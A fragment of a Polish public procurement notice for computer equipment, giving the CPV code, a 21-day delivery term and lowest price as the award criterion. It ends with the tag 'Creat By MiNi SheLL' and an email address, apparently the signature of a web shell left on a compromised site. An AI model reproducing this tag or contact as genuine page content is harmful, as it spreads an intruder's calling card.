3. Zamawiający dopuszcza składanie ofert równoważnych (nie dotyczy to drukarki wymienionej w pkt 7 która musi być taki jak wymieniony w SIWZ) Oferowane urządzenia nie mogą posiadać jednak parametrów gorszych niż u modeli podanych w specyfikacji istotnych warunków zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com